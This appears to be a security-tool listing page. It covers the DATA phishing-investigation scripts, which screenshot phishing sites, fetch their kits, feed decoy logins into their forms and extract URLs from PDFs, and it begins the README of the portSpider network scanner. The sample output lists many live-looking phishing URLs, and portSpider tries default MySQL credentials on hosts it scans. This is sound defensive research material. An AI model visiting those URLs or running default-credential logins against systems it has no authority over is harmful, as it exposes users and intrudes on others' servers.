[+] Screencapped http://www.govwebsearch.com/apc/opc/pdp/safe/optusnet.com.au/Login.html as 20170503-032950-openphish-www.govwebsearch.com.png
[+] Found Zip file at http://www.govwebsearch.com/apc/opc/pdp/safe/optusnet.com.au.zip
[+] Saved http://www.govwebsearch.com/apc/opc/pdp/safe/optusnet.com.au.zip as 20170503-032950-openphish-www.govwebsearch.com-optusnet.com.au.zip
[+] Found Opendir at http://www.govwebsearch.com/apc/opc/pdp/safe/optusnet.com.au/
[+] Found php file: http://www.govwebsearch.com/apc/opc/pdp/safe/optusnet.com.au/post.php
[+] Found Opendir at http://www.govwebsearch.com/apc/opc/pdp/safe/
[+] Saved http://www.govwebsearch.com/apc/opc/pdp/safe/optusnet.com.au.zip as 20170503-032951-openphish-www.govwebsearch.com-optusnet.com.au.zip
[+] Found Opendir at http://www.govwebsearch.com/apc/opc/pdp/
[+] Found Opendir at http://www.govwebsearch.com/apc/opc/
[+] Found Opendir at http://www.govwebsearch.com/apc/
Example of reading in a file of line separated urls
$ python bucklegripper.py -s openphish -r ../../test_urls.txt

.: BUCKLEGRIPPER v0.1 https://github.com/hadojae/DATA/ :.

[+] Beginning processing of ../../test_urls.txt

[+] Processing http://onjasela.net/DB/fr/
[+] Screencapped http://onjasela.net/DB/fr/ as 20170503-010034-openphish-onjasela.net.png

[+] Processing http://suesschool.com/yahoologin/yahoologin/clients/login.php
[+] Screencapped http://suesschool.com/yahoologin/yahoologin/clients/login.php as 20170503-010053-openphish-suesschool.com.png
[+] Found Opendir at http://suesschool.com/yahoologin/yahoologin/clients/
[+] Found php file: http://suesschool.com/yahoologin/yahoologin/clients/login.php
[+] Found php file: http://suesschool.com/yahoologin/yahoologin/clients/data.php
[+] Found php file: http://suesschool.com/yahoologin/yahoologin/clients/block.php
[+] Found Opendir at http://suesschool.com/yahoologin/yahoologin/
[+] Found php file: http://suesschool.com/yahoologin/yahoologin/login.php
[+] Found php file: http://suesschool.com/yahoologin/yahoologin/data.php
[+] Found php file: http://suesschool.com/yahoologin/yahoologin/block.php
[+] Found Zip file at http://suesschool.com/yahoologin.zip
[+] Saved http://suesschool.com/yahoologin.zip as 20170503-010125-openphish-suesschool.com-yahoologin.zip
[+] Found Opendir at http://suesschool.com/yahoologin/

[+] Processing http://communitypartnersjc.org/wp-admin/js/index
[+] Screencapped http://communitypartnersjc.org/wp-admin/js/index as 20170503-010138-openphish-communitypartnersjc.org.png

[+] Processing http://ytrdesh.com/info/
[+] Screencapped http://ytrdesh.com/info/ as 20170503-010148-openphish-ytrdesh.com.png

...continues...

BULLYBLINDER (py)
  • While capturing a pcap visit a suspected phishing page. Handle redirectors and obfuscation to find a web form. Scrape the form and make educated guesses at what should be entered into the fields. Submit the form and repeat.
  • Requirements can be installed by running or reviewing install_bullyblinder_deps.sh
usage: bullyblinder.py [-h] -u URL [-a USERAGENT] -i INTERFACE

Visit a suspected phishing page and attempt form filling while getting a pcap

optional arguments:
-h, --help show this help message and exit
-u URL, --url URL Url to visit
-a USERAGENT, --useragent USERAGENT
Custom User-Agent to use
-i INTERFACE, --interface INTERFACE
Interface to tell tshark to listen on
Example Usage
$ python bullyblinder.py -i eth0 -u http://www.justpropertydevelopers.com/scanned

.: BULLYBLINDER v0.1 https://github.com/hadojae/DATA/ :.

[+] Preparing pcap: 20170503-033243-www.justpropertydevelopers.com.pcap

[+] Processing http://www.justpropertydevelopers.com/scanned

[+] Submitting POST
[+] Control: <HiddenControl(hidCflag=1)>, Control.Type: hidden, Control.Name: hidCflag, Control.ID: hidCflag
[+] Control: <SelectControl(<None>=[])>, Control.Type: select, Control.Name: None, Control.ID: None
[+] Control: <SelectControl(<None>=[*0])>, Control.Type: select, Control.Name: None, Control.ID: None
[+] Control: <SelectControl(<None>=[*1])>, Control.Type: select, Control.Name: None, Control.ID: None
[+] Control: <SelectControl(<None>=[*2])>, Control.Type: select, Control.Name: None, Control.ID: None
[+] Control: <SelectControl(<None>=[*3])>, Control.Type: select, Control.Name: None, Control.ID: None
[+] Control: <SelectControl(<None>=[*4])>, Control.Type: select, Control.Name: None, Control.ID: None
[+] Control: <TextControl(Email=shannonjudith@gmail.com)>, Control.Type: email, Control.Name: Email, Control.ID: Email
[+] Control: <PasswordControl(Passwd=696969)>, Control.Type: password, Control.Name: Passwd, Control.ID: Passwd
[+] Control: <SubmitControl(signIn=Sign in to view attachment) (readonly)>, Control.Type: submit, Control.Name: signIn, Control.ID: signIn
[+] Control: <CheckboxControl(PersistentCookie=[yes])>, Control.Type: checkbox, Control.Name: PersistentCookie, Control.ID: PersistentCookie
[+] Control: <HiddenControl(rmShown=1) (readonly)>, Control.Type: hidden, Control.Name: rmShown, Control.ID: None

[-] No form found, checking for redirectors and obfuscation.

[+] Found js window.location or document.location, processing the redir

[+] https://drive.google.com/#my-drive appears to be a legitimate website.

[+] Complete! Submitted 1 form(s)

[+] Url Request Chain:
http://justpropertydevelopers.com/scan/docg/doc/filewords/index.php
--http://justpropertydevelopers.com/scan/docg/doc/filewords/index.php

SLICKSHOES (sh)
  • A basic bash script that pulls urls out of pdfs in streams or in clear view.
  • The only argument to the script is the path to a folder containing the pdfs you want to process.
  • REQUIRES pdf-parser.py from https://blog.didierstevens.com/programs/pdf-tools/; its location must be set in the first line of the script
Example Usage
$ ./slickshoes.sh ~/PDFs/
http://4cgemstones.com/polaiowpwwww/GD/index.php
http://80bpm.net/invoice-17524-Apr-26-2017-US-048591/
http://acheirapido.com.br/arquivos/pdf/
http://adams-kuwait.com/REview/office
http://rfaprojects.co.uk/invoice-80633-Apr-24-2017-US-665952/
http://sacm.net/SCANNED/ZN3747CGMSCWC/
https://geloscubinho.com.br/cgi/pdf/index.php
http://afriquecalabashsafaris.com/layouts/GD/index.php
http://akukoomole.com/AdobeLogin/index.php
...continues...
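What slickshoes does, as an added Python example that is not part of the DATA project: pull URLs out of a PDF both from clear text (e.g. /URI link annotations) and from FlateDecode-compressed streams. The PDF bytes are constructed here and use the reserved .invalid TLD.

```python
"""Added example, not part of the DATA project: extract URLs from a PDF in
the clear and inside FlateDecode streams, the two places slickshoes looks.
The sample PDF is constructed test data."""
import re
import zlib

# Stops at whitespace, PDF string delimiters, angle brackets and backslashes.
URL_RE = re.compile(rb'https?://[^\s<>()"\\]+')
STREAM_RE = re.compile(rb'stream\r?\n(.*?)\r?\nendstream', re.S)


def extract_pdf_urls(pdf_bytes):
    """Return sorted, de-duplicated URLs found in clear text or in streams."""
    found = set(URL_RE.findall(pdf_bytes))
    for match in STREAM_RE.finditer(pdf_bytes):
        try:
            data = zlib.decompress(match.group(1))
        except zlib.error:
            continue  # not deflate, or truncated: only the clear-text pass applies
        found.update(URL_RE.findall(data))
    # Not handled here: URLs split by PDF string escapes or written as hex strings.
    return sorted(u.decode('latin-1').rstrip('.,;') for u in found)


def build_sample_pdf():
    """Minimal PDF with one /URI link annotation in the clear and one URL in a
    compressed content stream (constructed test data)."""
    content = zlib.compress(
        b'BT /F1 12 Tf (Open http://example.invalid/AdobeLogin/index.php) Tj ET')
    return (
        b'%PDF-1.4\n'
        b'1 0 obj << /Type /Annot /Subtype /Link '
        b'/A << /S /URI /URI (http://example.invalid/scan/GD/index.php) >> >> endobj\n'
        b'2 0 obj << /Length ' + str(len(content)).encode() + b' /Filter /FlateDecode >>\n'
        b'stream\n' + content + b'\nendstream\nendobj\n'
        b'%%EOF\n'
    )


if __name__ == '__main__':
    for url in extract_pdf_urls(build_sample_pdf()):
        print(url)
```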
*PINCHERSOFPERIL and BULLYBUSTER are WIP
DATA scripts are a constant work in progress. Feedback, issues, and additions are welcomed.
Proper Python packages will be created once sufficient testing and features have been added and more bugs have been squashed.

Troubleshooting
If you have pcap writing issues, use this to fix up dumpcap permissions (observed on some VPS hosts):
sudo chgrp YOUR_USER /usr/bin/dumpcap
sudo chmod 750 /usr/bin/dumpcap
sudo setcap cap_net_raw,cap_net_admin+eip /usr/bin/dumpcap
Be sure to disable NIC offload features when capturing traffic; run this as root. Checksum errors will cause all sorts of nightmares.
# for i in rx tx sg tso ufo gso gro lro; do ethtool -K eth0 $i off; done


portSpider - A Lightning Fast Multithreaded Network Scanner Framework With Modules


A lightning fast multithreaded network scanner framework with modules.

modules:
  • http - Scan for open HTTP ports, and get the titles.
  • mysql - Scan for open MySQL servers, and try to log in with the default credentials.
  • mongodb - Scan for open MongoDB instances, and check if they are password protected.
  • ssh - Scan for open SSH ports.
  • printer - Scan for open printer ports and websites.
  • gameserver - Scan for open game server ports.
  • manual - Scan custom ports.

commands:
  • modules - List all modules.
  • use - Use a module.
  • options - Show a module's options.
  • set - Set an option.
  • run - Run the selected module.
  • back - Go back to menu.
  • exit - Shut down portSpider.

installing:

Debian based systems:
$ sudo apt-get update && sudo apt-get install python3 python3-pip -y

$ git clone https://github.com/xdavidhu/portSpider

$ cd portSpider/

$ python3 -m pip install -r requirements.txt

macOS / OSX:
$ brew install python3

$ git clone https://github.com/xdavidhu/portSpider

$ cd portSpider/

$ python3 -m pip install -r requirements.txt
NOTE: You need to have Homebrew installed before running the macOS/OSX installation.
WARNING: portSpider is only compatible with Python 3.3 & 3.4 & 3.5 & 3.6

developers: